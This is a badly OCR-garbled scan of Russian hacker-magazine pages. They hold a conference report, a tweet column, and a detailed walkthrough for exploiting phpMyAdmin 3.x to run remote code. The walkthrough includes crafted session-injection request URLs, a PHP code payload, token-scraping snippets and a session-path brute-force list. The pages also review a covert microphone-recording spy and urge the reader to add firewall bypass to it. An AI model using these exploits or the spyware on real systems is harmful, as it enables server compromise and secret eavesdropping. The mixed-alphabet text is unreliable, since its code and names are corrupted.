Лишь в конце доклада стало немного интереснее, 



когда Джастин презентовал свой проект русТ, который 
представляет собой набор шаблонов на питоне для 
веб-тестинга. Чтобы не писать каждый раз один и 
тот же код, ты можешь просто взять готовый шаблон, 
по-быстрому подправить его немного — и все готово. 

К сожалению, проект, судя по активности в 8ѴІМ, под- 
заброшен. 

День второй 

На второй день я все-таки решил поучаствовать в 
СТР, который проходил в рамках конференции. На 
самом деле это был скорее НаскОиезІ с набором бал- 
лов за пройденные задания, чем СТР в чистом виде. 

В самом начале само собой шли простые этапы, в 
основном с подстановкой необходимых значений в 
НТТР-заголовки запроса и просто нахождением нуж- 
ных флагов в различных местах исходных кодов. Чем 
дальше, тем, конечно, сложнее. К сожалению (да-да, 
именно так :), в этом квесте я натолкнулся на одну 
из самых больших проблем на этой конференции: 
в здании банально практически не было доступных 
электрических розеток (кстати, английского типа, так 
что пришлось искать еще и переходник). Так что как 
только я добрался до первой десятки по баллам, мой 
ноут предательски ушел спать. 

Помнишь, я писал, что докладов про 80І_ на конфе- 
ренции было представлено даже избыточно? Более 
того, часто доклады про успехи в безопасности 80І_ 
были изрядно нашпигованы маркетинговым трешем. 
Примером этого были выступления Джанне Уусилехто 
из N окіа и парней из МісгозоіТ. Красивые графики и 
клипарты, слова о киберпреступности и о том, какие 
безопасные продукты стремятся производить ком- 
пании. К слову сказать, к вебу данные презентации 
отношения имели мало. МісгозоіТ умудрились вообще 
вставить пропагандистскую часть про то, какие они 
теперь открытые, как дружат с опенсорсом. Я нор- 
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Обедали мы прямо «по-спартански». Все столовые были закрыты, поэтому накрыли прямо в музее... 



мально отношусь к этим компаниям, но тут они могли вполне 
и более интересные и уместные доклады подготовить. Не без 
интереса я посмотрел на доклад «Новые стандарты и приходя- 
щие технологии в безопасности браузера» от Тобиаса Гондрома 
из рабочей группы Специальной комиссии интернет-разработок 
(ІЕТР). Получился хороший обзор средств безопасности, так или 
иначе связанных с веб-браузером: 

• Міте-ЗпіШпд; 

• Зате-Огідіп Роіісу; 

• Зесиге СНаппеЕ * Н5Т5 Зігісі Тгапзрогі Зесигііу * ИЗ іп 
ОЫЗЗЕС; 

• Егате-Орііопз; 

• Сопіепі Зесигііу Роіісу; 

• Оо-ІЧоІ-Тгаск. 

Про большинство из них ты уже наверняка наслышан, останов- 
люсь лишь на Н5Т5. Атака 35І_-5Ігірріпд известна уже достаточно 
давно. Напомню, она заключается в том, что исходя из того, что 
веб-браузер жертвы не знает, что с конкретным сайтом можно 
взаимодействовать строго по НТТР5, злоумышленник, про- 
пуская трафик жертвы через свой хост (например, с помощью 
атаки АРР-зрообпд), заменяет все ЫТрз-ссылки на обычные 
ЫТр. Таким образом, трафик до него приходит в открытом виде, 
а уже от хоста злоумышленника до сайта создается полноценное 
55І_-соединение. НТТР Зігісі Тгапзрогі Зесигііу (Н5Т5) как раз и 
позволяет веб-приложению явным образом сказать веб-браузеру, 
что работа с ним должна идти строго по НТТР5. Делается это 
отправкой в НТТРЗ-ответе специального заголовка: Зігісі- 
Тгапзрогі-Зесигііу: тах-аде=1 5768000; іпсІисІеЗиЬПоппаіпз. 

В данном случае веб-приложение просит веб-браузер в течение 
15768000 секунд обращаться к нему строго по НТТР5, включая 
субдомены. 

Одно из самых достойных технических выступлений подготовил 
Дэн Корнелл из Сіепіт Ѳгоир. Он практически препарировал 
мобильное приложение на примере ЮЗ и АпбгоісІ-платформ 
с указанием на фишки каждой из них. Какие утилиты можно 
использовать для бинарного анализа мобильного приложения, 
что интересного хранится в конфигах, и к чему может привести 
ЗОЕ-инъекция в мобильном приложении, — все это Дэн рас- 
сказал, сопровождая примерами и юмором. Одной из основных 



идей доклада стала атака на мобильное приложение через его 
же зарегистрированный в системе контент-хэндлер: <іітате 
5гс=»іНе_зсЬете://з1:и^?рагат=РАѴІ_ОАО» />. Получается инте- 
ресная атака на стыке веба и мобильного мира. Мобильные при- 
ложения, ровно как и «мобильное все», сейчас, конечно же, на 
взлете популярности, так что стоит обратить внимание на этот не 
совсем «вебовский» доклад. 

Достаточно интересным получился доклад Джастина Кларке из 
ОоіЬат Оідііаі Зсіепсе о практическом аспекте криптоатак на 
веб-приложения. На криптографии базируется огромный костяк 
технологий информационной безопасности. 

Но криптография — весьма непростая наука, и нередко раз- 
работчики ошибаются при собственной реализации алгоритмов 
или при неправильном использовании существующих. Это и 
постарался рассказать Джастин. Криптографическая тема обыч- 
но не из самых захватывающих, особенно когда ты не крип- 
тоаналитик, но тут после демонстрации того, как с помощью 
рабсііпд-криптоатаки получилось вытащить содержимое конфига 
дотнетовского приложения, стало гораздо увлекательнее :). 

Не обошли стороной и генераторы случайных чисел и риски, 
связанные с их необдуманным использованием (вспоминается 
отличная статья «Неслучайные числа» ѵѵѵѵѵѵ.хакер.ги/тадагіпе/ 
ха/ 1 1 9/058/1 .азр). Это выступление я бы назвал одним из самых 
интересных на конференции. Обязательно посмотри слайды на 
сайте конференции. 

Оиіго 

Пара слов о месте проведения конференции. Тринити-колледж 
превзошел ожидания. Мало того, что это хорошо оснащенное 
учебное заведение, которое входит в Дублинский университет, так 
еще и насквозь пропитанное историей. Шутка ли, он был основан 
в 1592 году Королевой Елизаветой I! Очень сильно надеюсь, что 
и в России универы приблизятся когда-нибудь по условиям для 
обучения к подобным вузам. Сама конференция 0ѴѴА5Р АррЗес 
Еигоре тоже удалась. Даже несмотря на малое количество и не 
всегда высокий уровень технических докладов. И даже несмотря 
на весьма специфичную ирландскую погоду :). Надеюсь, что в 
следующем году в Греции все-таки приму участие в конфе уже как 
спикер, ц-ц 
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ШСКЕК ТѴѴЕЕТ8 

О Твиттер в последнее время стал настоящей кладезью знаний по информационной 
безопасности. Но это следствие. Важна причина - в твиттере обитает тусовка самых 
продвинутых ресерчеров и хакеров. Чтобы вовлечь тебя в этот мир и приблизить к элите, 
Алексей Синцов в этой колонке будет ежемесячно отбирать самые интересные твиты. У него и 
у самого есть микроблог - ІѵѵіНег.сот/азіпІзоѵ - советуем тебе с него и начать. 




ГЭсезагсег: 

Советик ресерчерам: круче 
искать новый вектор атаки, 
чем уязвимости: если ты 
нашел всего один новый вектор, то ты 
нашел дюжину уязвимостей. 



ГЭРіоІгВапіа: 

Если тебе понравились мои 
последние исследования 
(типа такого: Есо/ЦехрРІР ). то 
ты можешь номинировать меня на рѵѵпіе 
аѵѵагсіз ( Ссо/РбЬіКіб ). 

Комментарий: Петр Бания — известный 
исследователь, который в отличие от 
большинства хакеров акцентирует свое 
внимание на методах защиты. С его 
исследованиями можно ознакомиться 
по указанной ссылке, а кроме того — ты 
можешь отдать свой голос на номинацию 
его как автора (ну можно, конечно, и 
другого выбрать) на приз в номинации 
«Лучшее исследование года», проходя- 
щее в рамках ВІаскЬа* 201 1 в Лас-Вегасе. 



ГаШгБес: 

Арест людей не остановит нас, 
ФБР! Мы прекратим огонь, 
если вы оденете башмаки на 
ваши головы. Это единственный способ 
остановить все это! 



ГЭзІіаѵег: 

*Шикарный* заголовок вакан- 
сии: «5опу Еіесігопісз ищет 
талантливого сеньора анали- 
тика по информационной безопасности 
приложений в нашу штаб квартиру в Сан- 
Диего. Ты знаешь зачем.» 



(ЭеѵсІокітоѵсІБ: 

ЮАѵб.1 и НехРауз ѵі .5 утекли. 
История бир:/Л.со/0400В50 









ГЭОхсИагІіе: 

Хороший секюрити исследо- 
ватель != хороший пен-тестер. 



ГЗкіпдсоре: 

Как и обещал: удаленный 
гооі-эксплойт для ОрепЭЗН 
З.брі под ЕгееВЭБ. 
ЬНр:/Л.со/РУНсі9ѴѴ 





(ВІООгіі: 

Закинул на блог другое 
описание М51 1-056: СѴЕ- 
201 1-1282: Разыменование 
нулевого указателя в ІІзег-МосІе & Ко. 
Смотри ссылку: ЬирѴЛ.соЛЕп . 
Комментарий: Известный польский 
хакер сообщает подробности и иные 
детали для реализации атаки на С5Р55- 
подсистему с использованием уязвимо- 
сти СѴЕ-201 1-1282. 



ГЭаагопрогіпоу: 

Я почти уверен, что мог бы 
найти кучу багов, банально 
ища конструкции «стр гед8, 
ОхЗЕ». Почему, ну почему, так любят 
разработчики писать свои собственные 
ХМБ-парсеры? 

Комментарий: Аарон Портной рас- 
сказывает простой принцип поиска 
ХМБ-парсера по шаблону «стр гед8, 
ОхЗЕ» (ОхЗЕ — символ закрытия тэга: 
V. стр — инструкция сравнения). 

Или же, где программа ищет символы 
тэгов, говорит о том, что она их обра- 
батывает — например, это может быть 
ХМБ-парсер... а они обычно дырявые) 






ГасгурІОасІ: 

Каждый раз, когда ты дума- 
ешь, что ты закончил фей- 
спалминг, появляется новая 
академическая работа, которая напоми- 
нает тебе — что заканчивать с этим ещё 
рано... ШОР. 

Комментарий: .ЮР — Зитр Огіепіесі 
Ргодгаттіпд, тот же РОР, только для 
передачи управления используется 
регистр (ЗМР гед), а не слово из стека 
при РЕТІМ. 



1 



П^егетіаНд: 

«Нарушение безопасности 
в Р5А заставили компанию 



предложить клиентам заме- 
нить почти весь миллион Токенов» = вот 
цена зеро-дея. 



ГаАгіеІ_СогопеІ: 

Гугль должен заполнять авто- 
матически всю инфу обо мне 
в Гугл+. Ну же... вы же знаете, 
где я живу, с кем общаюсь, сплю ли или 
нет и т.д. 




гаОхсНагІіе: 

Ну же М5: найти удаленную 
багу в ѴѴіпсІоѵѵз 7 — 0 баксов. 
Найти ребят, кто запустит 
ботнет — 250 000 долларов. Реактивное 
мышление, а надо бы проактивное! 
Комментарий: МісгозоК не хочет вводить 
программу вознаграждения за уязвимо- 
сти... Чарли Миллер намекает... 



ГСМакаті: 

Итак, моя 88-летняя бабуля тра- 
тит последние несколько часов 
перед сном, играя в видео 
игрули на іРасГе. Мы живем в будущем. 



(ЭаНаскгезеагсГі: 

Неважно, есть ли у тебя 
сисадмин, сканер уязвимо- 
стей или рок-звезда иссле- 
дователь — тебя все равно поимеют. 
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Взлом известного двинш с помощью 
нашумевшего бага в глобализации переменных 



ф Седьмого июля текущего года все продвинутое ІТ-сообідество 
всполошилось в связи с появлением известия о том, что все последние 
версии дефолтного Му50І_-менеджера рНрМуАбтіп уязвимы к некой 
детской атаке, связанной с неконтролируемой глобализацией 
переменных. Предлагаю тебе вместе со мной окунуться в 
увлекательное исследование анатомии данной уязвимости. 



Предыстория 

Я надеюсь, что тебе не надо объяснять, что такое рбрМуАсІтіп и 
с чем его едят, поэтому перейдем сразу к его хладному трупу :). 
Седьмого июля некий буржуйский багокопатель под ником Мапдо 
обнаружил следующее интересное место в коде движка: 

. /1іЬгагіе5/аи*И/5мекеу/5мекеу . аи1:Кі . ІіЬ . рИр 

і-р (бТгбТг ($_5ЕКѴЕК[ ' (21ІЕКѴ_5ТКІМС 1 ] у ' 5е55Іоп_*о_ип5е* ' ) 

! = -РаІБе) 

{ 

рагБе_БІ:п($_5ЕКѴЕК[ ' (21ІЕКѴ_5ТКІІ\ІС ' ] ) ; 
5еБ5Іоп_ыпі1:е_с1о5е( ) ; 

5еБ5Іоп_ісІ($5е55Іоп_1:о_ип5е1:) ; 

5е55Іоп_5І:аг1:() ; 

$_5Е55ІОЫ = аггау() ; 

5е55Іоп_ыпі1:е_с1о5е( ) ; 

5еБ5Іоп_сІе5І:гоу ( ) ; 
ехіі: ; 

} 



Ты спросишь, что в этом коде такого интересного? Обрати вни- 
мание на функцию рагзе_5Іх(). В предыдущих выпусках журнала 
ты уже мог неоднократно прочитать о том, что при определенных 
условиях из-за данной функции может возникнуть баг с так назы- 
ваемой неконтролируемой глобализацией переменных. В данном 
случае такими условиями являются: 

1. Отсутствие второго параметра в функции рагзе_5І:г(); 

2. Полный контроль удаленного пользователя над переменной; 
$_5ЕРѴЕР[‘01ІЕРУ_5ТРІ N0’] (это то, что идет в ссылке после 
знака «?»). 

В первые несколько дней после обнаружения уязвимости никто 
не мог или не хотел вникать в ее суть (в том числе и я). Данная 
ситуация была крайне забавной, так как автор даже указал воз- 
можный вектор применения бага: перезапись глобального массива 
$_5Е55І0І\І, эффект от которой сохранится даже после перезагруз- 
ки страницы. 

В своем оригинальном сообщении Мапдо пишет, что при про- 
смотре указанного выше подозрительного кода может создаться 
впечатление, будто перезаписанная сессия уничтожится. Но это не 
так. В данном случае функция 5е55Іоп_\л/гіІе_сІО5е0 сохранит нашу 



► 064 
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Успешное выполнение КРІ через баг в сериали- 
заторе сессий 

перезаписанную сессию, а затем зеззіопДсН) запустит 
новую сессию, не имеющую ровным счетом ничего 
общего с нашей. Из-за такого переключения сессий баг 
очень сложно было бы обнаружить с помощью обычно- 
го браузера, так как зез5Іоп_5ІагШ пошлет нам новые 
куки и попросит забыть о модифицированной сессии. 
Пример инжекта произвольных переменных в сессию 
выглядит так: 

Іі1:1:р://рта/?5е55Іоп_1:о_ип5е1:=123&1:океп= 
[ТОКЕН]&_5Е55ІОІ\І[-Роо] = Ьаг 

Так как переменные сессии принимают участие во мно- 
жестве мест движка, теоретически может возникнуть 
куча Х55 и 5СП_-дырок. Однако мы сфокусируемся на 
нескольких наиболее серьезных векторах. 

Первый вектор атаки 

Для понимания первого вектора атаки мы должны 
пройтись по исходному коду нескольких файлов. 
Сначала давай заглянем в код класса для автомати- 
ческой генерации конфига ./зеіир/ІіЬ/СопІідѲепегаІюг 
сіазз.рбр: 

риЬІіс зіаіііс -Рипсізіоп §е1:Соп1і§Рі1е( ) 

{ 

$с = $с-Р->§еШ)пй§(); 

$ге1: = ' < РрГір ' . $сг1Т 
ІТ ($сТ->§еТ5епѵегСоип1:( ) > 0) { 



М 1 9 1' * 



СИ1 ч*— > 
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Работа первого эксплоита Мапдо 

$с = $_5Е55І0М[$1:І1І5- >ІСІ] ; 

геіигп $с; 

} 

Бинго! Переменная $с полностью зависит от массива 
$_5Е55І0І\І, который, как ты уже понял, находится под 
нашим контролем! Теперь мы легко сможем инжектнуть 
произвольный РНР-код, который будет сохранен в файл 
,/сопбд/сопбд.іпс.рИр. 

В данном способе эксплуатации нет никаких ограниче- 
ний (вроде авторизации или обязательного отключения 
тадіс_дио1;е5_дрс). Омрачает ситуацию лишь один 
факт — папка ,/сопбд не является дефолтной для движка, 
так что попасть в точку ты сможешь лишь один раз из ста. 

Второй вектор атаки 

Второй способ уже не зависит от наличия папки ,/сопбд 
на сервере. Зато появляются две другие зависимости: 
тадіс_дио1:е5_дрс = Оп и наличие логина и пароля к 
любой из баз данных текущего тузді-сервера. 

Начинаем потрошение исходников: 

. /5егѵег_5упсМгопІ2е . рИр 

$1 = п§_сІЬ = $_5Е55І0І\І[ 'іг§_сІЬ 1 ] ; 

$ипсоттоп_1:аЫе5 = $_5Е55І0І\І[ ' ипсоттоп_1:аЫе5 ' ] ; 




> ѵѵагпіпд 

Ни автор, ни редакция 
не несут никакой 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



> СІѴСІ 

На нашем диске 
ты сможешь найти 
эксплоиты ко всем 
описанным уязвимо- 
стям. 



-Рогеасіі ($с[ 'Бегѵегз ' ] аз $ісІ => $зегѵег) { 

$ге1: .= '/* Зегѵеп: ' . 

5І:г1:г($с-р->§е1:5егѵегМате($ісІ ) , 

. " [$ісІ] */" . $с г1"Р . 1 $і++; ' . $сг1Т; 

Теперь нам нужно разобраться в этой каше. Первым 
делом обрати внимание на то, что данный код генерирует 
РНР-листингс конфигом для рбрМуАбтіп. Здесь можно 
заметить, что ключ массива $с[‘5егѵегз’] (переменная 
$іб) не фильтруется. Таким образом, если мы сможем 
переименовать этот ключ в массиве, то сможем закрыть 
комментарий и проинжектить произвольный код. 

Далее смотрим на функцию деіСопбдО, с помощью 
которой и получается нужный нам массив $с: 

. /1іЬгагіе5/сопй§/Сопй§Рі1е . сіазз . рИр 

риЫіс Типсііоп §е1:Соп^§() 

{ 



РМА_сгеа1:еТаг§е1:ТаЫе5($5гс_сІЬ : , $іг§_сІЬ,, 
$5гс_1іпк, $1:г§_1іпк, $ипсоттоп_1:аЫе5, 
$ипсоттоп_1:аЫе_5І:гис1:иге_сІі-РТ[$5] ^ 
$ипсоттоп_1:аЫе5_-(іе1сІ5, Таізе); 

Смотрим на функцию РМА_сгеаІеТагдеСГаЫ.ез: 

./1іЬгагіе5/5егѵег_5упсИгопІ2е ЛіЬ.рМр 

Типсіііо РМА_сгеа1:еТаг§е1:ТаЫе5($5гс_сІЬ, 

$1=г§_с1Ь, $5гс_Нпк^ $іг§_1іпк,, 
&$ипсоттоп_1:аЫе5, $1:аЫе_іпсІех, 
&$ипсоттоп_1:аЫе5_-Ііе1сІ5 і $сІІ5р1ау) 

{ 

$Сгеа1:е_ТаЫе_(2иегу = рге§_гер1асе( ' / ' 

. РМА_Ьаскдиоіе($ипсоттоп_1:аЬ1е5 [$іаЬ1е_іпсІех] ) 
. РМА_Ьаскдиоіе($1:г§_сІЬ) . 

. РМА_Ьаскдио1:е( 

$ипсоттоп_1:аЫе5 [$іаЫе_іпсІех] ) , 
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> Ііпкз 

• «Ііпзегіаііге-багв 
картинках: ошибки 
десериализации 
классов на живых 
примерах» — ЬіТІу/ 
оп^ЬАи . 

• «РНР и волшебные 
методы: сериализа- 
ция РНР-объектов 
глазами хакера» — ЬіТ 

Іу/пОсоѵѵс . 
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Работа второго эксплоита Мапдо 



$Сгеа1:е_(2иегу, $1іті1: = 1); 



Если ты внимательно следил за руками, то должен был заме- 
тить, что переменные $ипсоттоп_ІаЫе5[$ІаЫе_іпсІех] и 
$Ігд_сІЬ переходят в функцию ргед_гер1асе() прямиком из мас- 
сива $_ЗЕ35ЮІ\І. Так как я более чем уверен, что ты наслышан 
об одном из самых распространенных багов в РНР-движках — 
выполнении произвольного кода в ргед_герІасе() с модифи- 
катором «е» (еѵаі), перейдем сразу к делу. В данном случае 
мы можем проинжектить модификатор «е» в первый параметр 
уязвимой функции с помощью банального нуллбайта примерно 
так: (.+)/е%00. Все, что идет после нуллбайта, сразу же отпадет, 
и компилятор не будет ругаться на неправильно построенную 
регулярку :). Дабы не засорять страницы журнала килобайтами 
кода, демонстрирующего работоспособность этого и предыду- 
щего способов эксплуатации нашего бага, я заботливо положил 
на наш диск соответствующие эксплоиты, с которыми и советую 
тебе ознакомиться. 

Кстати, известный Зибозіп раісб от Стефана Зссера успешно 
закрывает багу с нуллбайтом и модификатором «е», так что здесь 
мы получаем еще одно суровое ограничение. 

Тепличные эксплоиты 

Теперь небольшое лирическое отступление. Уязвимость с переза- 
писью глобальных переменных сама по себе не является чем-то 
фатальным. Здесь нужно найти какой-либо вектор эксплуатации 
с любой из перезаписанных переменных. Это может не всегда 
получиться. В данном случае Мапдо нашел сразу два таких векто- 
ра, но эксплоиты по их мотивам получились крайне тепличными, 
необходимость авторизации и наличия недефолтной директории 
для успешного использования бага не давали нам ничего на 
практике. 

Как ты уже понял, такая ситуация крайне меня не устраивала, 
поэтому после появления первых РоС я решил провести самостоя- 
тельное расследование. Здесь как нельзя кстати под руку подвер- 
нулся классный прошлогодний баг Стефана Зссера под названием 
«РНР Зеззіоп Зегіаіігег Зеззіоп Раіа Іщесбоп ѴиІпегаЬіІіІу», кото- 
рый очень хорошо согласовывался с уязвимостью в ипзегіаІігеО и 
«волшебных методах» РНР (ссылки на соответствующие статьи из 
прошлых номеров нашего журнала ищи в сносках). 

Уязвимость в сессиях 

Итак, остановимся немного подробней на вышеобозначенной уяз- 
вимости. По дефолту РНР-десериализатор сессий знает два специ- 
альных символа: РЗ_ОЕІ_ІМІТЕР и Р5_ІІМ0ЕЕ_МАРКЕР. Первый 
юзается для разделения сохраненных в сессии переменных, а вто- 
рой маркирует неопределенные переменные и представляет собой 
обычный восклицательный знак. Заглянем в исходники РНР: 

мбііе (р < епсІр1:г) { 
іѵаі ***тр; 
я = р; 




Проблема этого кода заключается в том, что сериализатор сессии 
корректно обрабатывает только символ Р8_0ЕиМІТЕР и забивает 
большой болт на Р5_ІІМ0ЕЕ_МАРКЕР. 

В результате своего исследования Стефан Эссер нашел спо- 
соб внедрения произвольных данных (если быть точнее: строк, 
чисел, массивов и объектов) в сессию с помощью ключа масси- 
ва $_5Е55І0І\І, начинающегося с символа Р5_ІІМРЕЕ_МАРКЕР. 
Примеры уязвимого к данной атаке кода выглядят так: 

<?рІір 

5е55Іоп_5І:аг1:( ) ; 

$_5Е55І0І\І[$_Р05Т[ ' ргебх 1 ] . ' Ыа ' ] = $_Р05Т[ ' сіаііа ' ] ; 

?> 



и 



< РрМр 

5е55Іоп_5І:аг1:() ; 

$_5Е55]Ш = аггау_тег§е($_5Е55ІОІ\Ц $_Р05Т); 

?> 

Эксплуатация здесь выглядит крайне тривиально: посылаем Р03Т- 
запрос ргебх=! и сІа1:а= | ххх 1 0 : 10 : "еѵіЮЬдес-б" : 0 : { }. 

В результате получаем инжект сериализованного объекта прями- 
ком в сессии. Не забывай, что данное внедрение аналогично вне- 
дрению в функцию ипзегіаІііеО. 

Вспоминая молодость 

Если ты внимательно следишь за нашим журналом, то должен 
помнить, что в тех же статьях про «волшебные методы» я описывал 
классный способ эксплуатации бага с десериализацией во второй 
ветке рбрМуАбтіп. 

Тогда авторы поступили не совсем логично. Сама уязвимая функ- 
ция ипзегіаІігеО, конечно же, была убрана из исходников движка, 
зато полезный нам код в функции ѵѵакеирП остался во всей тре- 

тьей ветке совершенно нетронутым. 

Теперь осталось только вспомнить механизм действия старого 
эксплоита, применить новые фишки и запилить новый убойный 
эксплоит. Итак, старый код для эксплуатации выглядел примерно 
следующим образом: 

б1:1:р ://5І1:е. сот/рбрМуАсІтіп/5сгір1:5/5е1:ир. рбр? 
ас1:іоп=1ау_паѵі§а1:іоп&ео11:уре=ипіх&1:океп=[ТОКЕН]& 
соп6§ига1:іоп=а:1:{і:Ѳ;0:1Ѳ: "РМА_Соп6§" :1: 

{з:6: "Боигсе" ; б : [ДЛИНА_ПУТИ] : " [ПУТЬ_К_РТР_С_ИНЖЕКТОМ] " ; }} 

Здесь мы получали классический Р РІ -ба г, омрачавшийся лишь 
проверкой на локальность с помощью мерзопакостной функции 
бІе_ехіз1:5(), которая, впрочем, легко обходилась с помощью указа- 
ния файла на любом доступном ЕТР-сервере. 

Не буду глубоко вдаваться в подробности (советую прямо сейчас 
прочитать соответствующие статьи по ссылкам в сносках), а скажу 
лишь, что со временем ребята с гсіоі.огд нашли способ работы 
данного сплоита без ЕТР с помощью инжекта прямо в файл сессии. 
Таким образом, наш ипзегіаІігеП-эксплоит становился универсаль- 
ным для всех версий рбрМуАбппіп < 3. 



► 066 
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Описание бага, найденного Стефаном Эссером 

Новая жизнь старых багов 

Намотав на ус вышеописанную информацию, ты, наверное, уже 
понял, что теперь мы приступим к написанию универсального экс- 
плоита для рЬрМуАсІппіп всей третьей ветки :). Сначала нам нужно 
узнать токен, с помощью которого движок проверяет валидность 
запросов (только с помощью валидного токена мы сможем сохра- 
нить в сессию произвольные данные). Делается это достаточно 
просто: 

1. Заходим на главную рЬрМуасІппіп; 

2. Парсим токен из НТМІ_-исходника страницы, например, так: 

рге§_та1:сІі( 

'(Эпате^'Токеп" ѵа1ие=" ( [а-Т0-9]{32}) "(Эіз ' $ра§е,$1:о) ; 
$Токеп = $То[1]; 

3. Таким же образом и с той же главной страницы парсим кукисы с 
идентификатором текущей сессии: 

рге§_та1:сІі( 

' @рГірМуАсІтіп= ( [а-20-9]{32,,40}) ; ?@із ' , $ра§е.» $зе) ; 

$5е55ІОП = $зе [ 1 ] ; 

4. Теперь пытаемся узнать текущий путь к папке с сессиями для 
успешного инклуда. Делается это с помощью простейшего цикла 
ѵѵбііе и списка наиболее популярных мест в системе: 

$зезз_ра1:Іі = *ау( 

’/Ттр/', 

' /ѵаг/Ттр/ 1 , 

' /ѵаг/НЬ/рІір/ ' , 

’/ѵаг/1іЬ/рІір4/ ' , 

' /ѵаг/1іЬ/рГір5/ ' , 

' /ѵаг/НЬ/рІір/зеззіоп/ ' , 

' /ѵаг/НЬ/рІірД/зеззіоп/ ' , 

' /ѵаг/НЬ/рІірБ/зеззіоп/ ' , 

Сам запрос для проверки на корректный инклуд в цикле выглядит 
примерно так: 



$іп] = $БѲ55_ра1:Іі[$о] . ' зе55_' .$зеззіоп; 

$Яиегу = $рта. ' ?зеззіоп_1:о_ип5е1:=123&1:океп= ' . 

$1:океп. ' &_5Е55І0І\І[ !Ыа] = ' . иг1епсосІе( 

' |ххх|а:1:{і:0;О:1Ѳ: "РПА_Соп^§ м : 1 : {з : 6 : "зоигсе"; з : ' . 
з1:г1еп($іп]) . ' .$іп] . ' 

Здесь: $зе55_раіЬ[$о] — это каждый путь из массива $зе55_раіЬ 
по порядку, фзеззіоп — полученный выше идентификатор сессии, 
$рта — путь к движку, $1океп — полученный выше токен. 

Запрос $циегу следует посылать два раза: в первый раз проис- 
ходит сам инжект, а во второй — проверка корректности пути к 
сессии. Если путь правильный, произойдет успешный инклуд, и 
мы увидим на экране содержимое файла сессии. Отследить инклуд 
можно по ключевому слову «РМА_Сопбд». 

После успешного инклуда ты можешь спокойно внедрять свой 
РНР-код. Внедрение можно произвести с помощью все того же 
бага с переопределением глобальных переменных: 

&_5Е55ІОІ\І[рау1оасІ]=<?рІір рбріітРо(); ?> 

Наша переменная рауіоаб попадает в файл сессии, после чего мы 
вполне сможем выполнить код при помощи описываемого РРІ. 
Готовый эксплоит с сессиями ты также сможешь найти на нашем 
диске. Здесь хочу заметить, что, хотя данный способ и является 
более универсальным, чем способы Мапдо, он тоже несколько 
ограничен: тадіс_диоІе5_дрс = оІТ и РНР <= 5.2.13 & РНР <= 

5.3.2. Данные ограничения все же ничто по сравнению с необхо- 
димостью наличия нестандартной открытой на запись папки на 
сервере. 

Злоключение 

Как видишь, любой когда-либо обнаруженный баг может еще 
вернуться и нанести свой удар по известнейшим программным 
продуктам. Особенно доставляет в данной ситуации тот факт, 
что наконец-то нашлось практическое применение для бага с 
сессиями Стефана Эссера (пока что в паблике не было ни одного 
РоС по теме). Тебе же я могу посоветовать никогда не смотреть 
на крутость и известность движка, а просто брать и потрошить 
его :). т~ 
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Программа: 0есосіеЬу.І)5 
сІе2епсІег РиЫіс 
ОС ѴѴіпсІоѵѵз 2000/ХР/2003 
5егѵег/Ѵізіа/2008 5егѵег/7 
Автор Р$20атег & Суко 
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РНР на лопатках 



Наконец-то в паблике появился приличный 
дешифровщик нетолько крипта 2епсІ, но и всем 
набившего оскомину іопСи Ье. Итак, встречаем! 
ОесобеЬу.115 бе2епсІег РиЫіс — это полно- 
функциональный РНР-декодер, родившийся 
в дебрях специализированного буржуйского 
форума бесобеЬѵ.из . Пользоваться прогой не 
просто, а очень просто: 

1 ■ Заливаем все файлы к себе на диск. 

2. Кидаем зашифрованные скрипты в папку 
О1_0есобе. 

3. Запускаем сценарий 0есосІе_Аи__РіІе5.Ьа1:. 

4. Смотрим на расшифрованные исходники в 
папке 02_Оесобеб (здесьже будет находить- 
ся и файлик І_од_0есосІесІ.1:х1: с логом работы 
декодера]. 

Прога работает со всеми версиями Винды и 
поддерживает следующие л оадеры: 

іопСиЬе РНР І_оасІег ѵЗ.1 
ІМиБрбеге РбрЕхргезз ѵЗ.Ѳ 
ІепсІ Орѣітігег ѵЗ.З 

От себя могу посоветовать тебе зарегистриро- 
ваться на том самом форуме бесобеЬѵ.из . так 
кактам можно найти еще очень много полез- 
нейшего стаффа. 

Программа: МісЗру Ву 5ЬЕ5Н І.ОЬ 
ОС ѴѴіпсІоѵѵз 2000/ХР/2003 Зегѵег/ 
Ѵізіа/2008 5егѵег/7 
Автор 5І.Е5Н 

В одном из прошлых выпусков рубрики я уже 
описывал микрофонного шпиона под назва- 
нием Міс5ру++ от ІЧідЫтаге. Данная утилита 
неплохо справлялась со своей задачей, но, как 
и у всех уникальных в своем роде программу 



Шпионим за звуком 

нее имелись свои недоработки и недостатки. 
Одним из таких недостатков было неудобство 
управления процессом записи звука. Настало 
время исправить это недоразумение, так что 
спешу представить твоему вниманию прогу 
МісЗру Ву5І_Е5Н, созданную по мотивамупо- 
мянутого выше Міс5ру++. Какясно из названия, 
данная прога предназначена для скрытой запи- 
си звука с устройства для записи голоса, уста- 
новленного поумолчанию в системе (микрофон, 
линейный вход, или стерео/моно микс]. 
Особенности шпиона: 

1. Данныезаписываются в формате трЗ, 24 
кГц, 32 кбит/с, моно. 

2. Для записи используется стандартный вин- 
довый кодек МРЕО І_АѴЕП-3. 

3. Название файлов генерируется как«год_ме- 
ся ц_ден ь_час-м и нуты -секунды. трЗ». 

4. Управление программой осуществляется 
через ѴѴЕВ-интерфейс. Для администриро- 
вания ты должен подключиться к порту 4545 
(Шр://127.0. 0.1:4545]. 

Админка утилиты предоставляет следующие 
функции: 

• выгрузка программы; 

• начало/остановка записи; 

• отображение списка записанных файлов 
+ их размер; 

• удаление записанных файлов; 

• скачивание записанных файлов. 

Как пишет сам автор, шпион пока что довольно 
сыроват, ноты с легкостью сможешь доделать 
функцию обхода виндового файрвола, а также 
инсталл в систему, благо исходники програм- 
мы идут с ней в комплекте: 

1. МісЗру.сірг — основная часть (реализация 
админки]. 

2. АРІ.раз — константы, типы и функции. 

3. МісРес.раз — функции записи. 



Программа: Веб-разведка 
ОС *піх/ѵѵіп 

Автор Кузьмин Антон & БІуег 



Всб-рѳэвсдка - работ с огчстамп 
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Отчеты «Веб-разведки» 

Поуже ставшей доброй традиции спешу 
поделиться стобой очередной тулзой «все в 
одном». 

На этот раз та ким комбайном является про- 
граммный комплекс «Веб-разведка», который 
предназначен для внешнего исследования 
сайтов с целью обнаружения аномалий в их 
работе, различных сбоев, а также потенциаль- 
ноуязвимых мест. 

На данный момент«Веб-разведка»умеет 
следующее: 

1 ■ Осуществлять поиск скрытых файлов и 
директорий (ссылок на которые на целевом 
сайте нет]. 

2. Осуществлять сигнатурное опознание 
установленных на сайте распространяемых 
